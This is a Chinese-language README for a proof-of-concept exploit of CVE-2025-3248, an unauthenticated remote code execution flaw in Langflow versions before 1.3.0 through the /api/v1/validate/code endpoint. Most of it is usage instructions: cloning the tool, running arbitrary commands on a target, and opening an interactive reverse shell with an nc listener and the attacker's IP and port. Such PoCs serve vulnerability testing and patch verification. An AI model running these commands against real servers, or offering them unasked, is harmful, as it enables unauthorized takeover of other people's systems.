
CVE-2025-3248 的 PoC:通过 /api/v1/validate/code 在 Langflow < 1.3.0 中实现未认证的远程代码执行(RCE)。
一个概念验证(PoC)漏洞利用程序,演示了 Langflow 代码验证端点中的远程代码执行漏洞。该漏洞影响 1.3.0 之前的 Langflow 版本,允许未经身份验证的攻击者通过精心构造的 HTTP 请求执行任意代码。
/api/v1/validate/coderequestscoloramagit clone https://github.com/preemware/langflow-exploit
cd langflow-exploit
pip install requests colorama
该漏洞利用程序支持两种操作模式:
在目标系统上执行单条命令:
python3 cve-2025-3248.py cmd <target_url> "<command>"
示例:
python3 cve-2025-3248.py cmd http://target:7860 "id"
生成一个交互式反弹 Shell:
nc -lvnp 4444
python3 cve-2025-3248.py shell <target_url> <your_ip> <your_port>
示例:
python3 cve-2025-3248.py shell http://target:7860 10.0.0.5 4444